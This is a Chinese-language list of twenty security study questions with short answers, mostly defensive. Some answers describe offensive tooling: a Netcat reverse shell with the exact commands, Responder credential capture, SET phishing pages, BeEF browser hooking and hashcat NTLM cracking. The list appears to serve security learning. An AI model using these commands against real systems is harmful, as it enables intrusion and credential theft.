摘要：企业员工众多，账号密码多，分散管理易混乱，密码泄露风险高，集中式密码管理系统统一管理，提高安全性和效率。功能包括密码存储，安全存储员工账号密码，常采用加密和加盐哈希。权限管理，按员工职责分配访问权限，不同级别访问不同密码。密码审计，记录密码操作日志，如修改、访

1.在企业密码管理中，为什么需要集中式密码管理系统，它有哪些功能？

企业员工众多，账号密码多，分散管理易混乱，密码泄露风险高，集中式密码管理系统统一管理，提高安全性和效率。功能包括密码存储，安全存储员工账号密码，常采用加密和加盐哈希。权限管理，按员工职责分配访问权限，不同级别访问不同密码。密码审计，记录密码操作日志，如修改、访问时间，便于追溯和发现异常。自动生成强密码，提高密码强度，降低安全风险。

2.Linux 系统中如何查看和管理正在运行的进程，以防范恶意进程？

可使用 ps 命令查看正在运行的进程，如 ps -aux 以详细格式显示所有进程，包括进程所有者、CPU 和内存使用情况等。也可用 top 命令实时动态查看进程状态，按资源使用情况排序。发现可疑进程后，可通过进程 ID（PID）使用 kill 命令终止，如 kill [PID]。还能结合 lsof 命令查看进程打开的文件和网络连接，分析进程行为，判断是否为恶意进程，及时采取措施。

3.如何防止Windows系统遭受勒索病毒攻击？

定期备份重要数据到外部存储设备或云端，且备份与主机隔离。安装正版操作系统和软件，及时更新系统补丁和应用程序，封堵勒索病毒利用的漏洞。安装专业杀毒软件和防火墙，开启实时监控功能。谨慎点击邮件附件、下载不明来源软件，不随意访问未知网站，避免下载恶意程序。还可通过组策略限制程序执行权限，降低感染风险。

4.简述 Linux 系统中系统启动脚本的作用及可能存在的安全风险，如何防范？

系统启动脚本在系统启动时自动执行，用于初始化系统服务、挂载文件系统等。可能风险是攻击者篡改启动脚本，在系统启动时运行恶意程序，获取持久化控制。防范方法是对启动脚本设置严格权限，如设为 600，只有所有者可读写。定期检查启动脚本内容，查看 /etc/rc.d/rc.local（CentOS 等）或 /etc/init.d/（Debian 等）下脚本，确认无异常添加内容。使用文件完整性检测工具，监控脚本是否被修改。

5.非对称加密算法与对称加密算法相比，有哪些优势和劣势？

优势在于非对称加密使用公钥加密，私钥解密，解决了密钥分发难题，适合网络环境下安全通信，如数字签名和身份验证。劣势主要是运算速度慢，相比对称加密，处理同样数据量耗时更多，且密钥管理复杂，密钥对生成和存储要求高。实际应用常结合两者，先用非对称加密传输对称加密密钥，再用对称加密处理大量数据，兼顾安全与效率。

6.Kali Linux下的BeEF（Browser Exploitation Framework）工具的用途是什么，如何使用？

BeEF主要用于针对浏览器的渗透测试，通过控制目标浏览器，利用浏览器及插件漏洞，获取目标主机信息或执行恶意代码。使用时，先在Kali Linux启动BeEF，在终端输入“beef-xss”。启动后，获取BeEF服务器的URL，将其注入到目标网页或通过钓鱼等方式让目标用户访问。当目标用户浏览器加载包含BeEF代码的页面，就会被BeEF控制，在BeEF控制台可执行各种攻击模块，如获取浏览器信息、摄像头控制等。

7.简述Windows系统中远程桌面服务的安全风险及防范措施。

安全风险有：若使用弱密码，易遭暴力破解；开放远程桌面端口（默认3389），易成为攻击目标；可能存在远程桌面相关漏洞被利用。防范措施：设置强密码，开启账户锁定策略；修改远程桌面默认端口，减少被扫描到几率；及时更新系统补丁修复相关漏洞；通过防火墙限制远程桌面访问来源，只允许信任IP连接。

8.Linux 系统中如何防范 SQL 注入攻击（假设运行 Web 服务并连接数据库）？

在应用程序层面，对用户输入进行严格过滤和验证，使用正则表达式等方法确保输入符合预期格式，拒绝非法字符。使用参数化查询，如在 PHP 中使用 PDO 或 mysqli 的预处理语句，将参数与 SQL 语句分离，防止恶意拼接。对数据库账户设置最小权限，只赋予执行必要操作的权限。在 Web 服务器前部署 WAF（Web 应用防火墙），检测和拦截 SQL 注入攻击流量，保护后端数据库安全。

9.简述密钥交换协议（如Diffie - Hellman）的工作原理及其在安全通信中的作用。

Diffie - Hellman协议让通信双方在不安全网络建立共享密钥。双方先协商公开参数，各自生成私钥和公钥。一方用自己私钥和对方公钥计算共享密钥，另一方同样操作，虽计算方式不同，但最终得到相同共享密钥。此共享密钥用于后续对称加密通信。作用是在不安全网络安全生成对称加密密钥，无需提前共享密钥，确保通信保密性，常用于VPN、SSL/TLS等安全通信场景。

10.Windows系统中的UAC（用户账户控制）是什么，有什么作用？

UAC是Windows系统的安全机制。当程序试图进行影响系统设置等关键操作时，UAC会弹出提示框，要求用户确认或输入管理员密码。它可防止恶意程序在用户不知情时进行危险操作，提高系统安全性。普通用户日常操作在标准权限下进行，需提升权限时通过UAC确认，避免恶意软件自动获取高权限破坏系统。

11.怎样在Kali Linux中使用Responder进行中间人攻击并捕获凭证？

在Kali Linux终端输入“responder -I [网络接口]”启动Responder，“-I”指定网络接口，如“eth0”。Responder会在指定网络接口监听，通过伪造各种网络服务（如LLMNR、NBT - NS等）响应，欺骗目标主机向其发送认证请求。当目标主机发起请求，Responder捕获并尝试解析其中的用户名和密码哈希等凭证信息。捕获到的凭证会显示在终端，可进一步利用工具如John the Ripper破解哈希获取明文密码。

12.Windows系统日志在安全分析中有什么作用，如何查看？

Windows系统日志记录系统、应用程序和安全相关事件。安全日志记录登录、权限更改等操作，可发现暴力破解、非法访问等攻击。系统日志记录系统组件错误、服务启动停止等，助于排查系统故障。应用程序日志记录应用程序特定事件。通过“事件查看器”可查看，在“运行”输入“eventvwr.msc”，展开相应日志类别分析。

13.Kali Linux中的Netcat工具用途广泛，如何利用它建立简单的反向Shell？

在Kali Linux上作为接收端，先开启监听，如监听8888端口，在终端输入“nc -lvp 8888”。“-l”表示监听模式，“-v”显示详细信息，“-p”指定端口。在目标主机（假设可执行命令）上执行“nc -e /bin/sh [Kali Linux IP] 8888”，“-e”指定执行的程序，这里是“/bin/sh”，即生成一个Shell会话，连接到Kali Linux指定IP和端口。若目标主机是Windows系统，可使用“nc.exe -e cmd.exe [Kali Linux IP] 8888”（需有nc.exe程序），从而在Kali Linux端获得目标主机的Shell权限。

14.在Kali Linux中，如何使用Nmap进行全面的网络扫描？

在Kali Linux终端输入“nmap -A [目标IP或网段]”。“-A”参数表示全面扫描，会启用操作系统探测、版本检测、脚本扫描及 traceroute 等功能。比如扫描单个IP “nmap -A 192.168.1.100”，能获取目标主机开放端口、运行服务的版本信息，还能推测操作系统类型，通过脚本扫描发现潜在漏洞，traceroute 可了解数据包到达目标主机的路径，全面掌握目标网络状况。

15.什么是数字签名，它是如何实现数据完整性和身份验证的？

数字签名基于非对称加密。发送方用私钥对数据哈希值加密生成数字签名，与数据一同发送。接收方用发送方公钥解密签名，得到哈希值，同时对接收数据计算哈希值，对比两者。若相同，说明数据完整且来自声称发送者，因私钥只有发送者持有，他人无法伪造签名，实现数据完整性验证和身份验证，常用于合同签署、软件发布等场景确保真实性和完整性。

16.怎样在Kali Linux中利用Nessus进行漏洞扫描？

首先确保Nessus已安装并启动，在浏览器中访问其Web界面，输入账号密码登录。创建新扫描任务，在目标设置中输入要扫描的IP或网段。选择扫描策略，如针对特定系统或行业的策略。配置好后启动扫描，Nessus会检测目标系统的各种漏洞，扫描完成后生成详细报告，报告中包含漏洞名称、描述、风险等级及修复建议等信息，帮助用户了解目标系统的安全状况。

17.在Kali Linux渗透测试中，如何利用Social Engineering Toolkit（SET）进行社会工程学攻击？

在Kali Linux终端输入“setoolkit”启动SET。进入菜单后，可选择多种攻击方式，如网页仿冒攻击。选择相应选项后，设置仿冒的目标网站，如银行网站，SET会生成一个仿冒链接。通过邮件、即时通讯等方式发送给目标，当目标点击链接，输入账号密码等信息，就会被攻击者获取。还可利用SET进行鱼叉式钓鱼攻击、二维码攻击等社会工程学手段。

18.Linux 系统中常见的文件系统权限有哪些，如何合理设置？

常见权限有读（r）、写（w）、执行（x），分别对应数字 4、2、1。对文件来说，读权限允许查看内容，写权限可修改，执行权限针对可执行文件。对目录，读权限可列出内容，写权限能创建和删除文件，执行权限可进入目录。合理设置权限需遵循最小权限原则，如普通用户文件设为 600（所有者有读写权限），可执行程序设为 755（所有者有读写执行权限，其他用户有读和执行权限），系统配置文件设为 640（所有者和所属组有读权限，所有者有写权限）。

19.简述在Kali Linux中使用hashcat进行密码哈希破解的方法及常用参数。

使用Hashcat破解密码哈希，先准备好哈希文件和字典文件。在Kali Linux终端输入“hashcat -m [哈希类型] -a [攻击模式] [哈希文件路径] [字典文件路径]”。常用参数中，“-m”指定哈希类型，如“1000”代表NTLM哈希类型；“-a”指定攻击模式，0为字典攻击，1为组合攻击等。例如破解NTLM哈希，若哈希文件为“hashes.txt”，字典为“passwords.txt”，则命令为“hashcat -m 1000 -a 0 hashes.txt passwords.txt”，Hashcat会根据设置的参数利用字典对哈希进行破解。

20.Linux 系统中如何防范 ARP 欺骗攻击？

静态绑定 ARP 表，通过 arp -s [IP地址] [MAC地址] 命令将网关或重要主机的 IP 与 MAC 地址绑定，防止 ARP 表被篡改。安装 ARP 防护工具，如 arpwatch，它监控网络中的 ARP 活动，发现异常 ARP 请求或响应及时报警。在网络设备（如交换机）上配置端口安全，绑定端口与 MAC 地址，限制 ARP 包来源，阻止 ARP 欺骗包传播，保护网络通信安全。

来源：Kali与编程一点号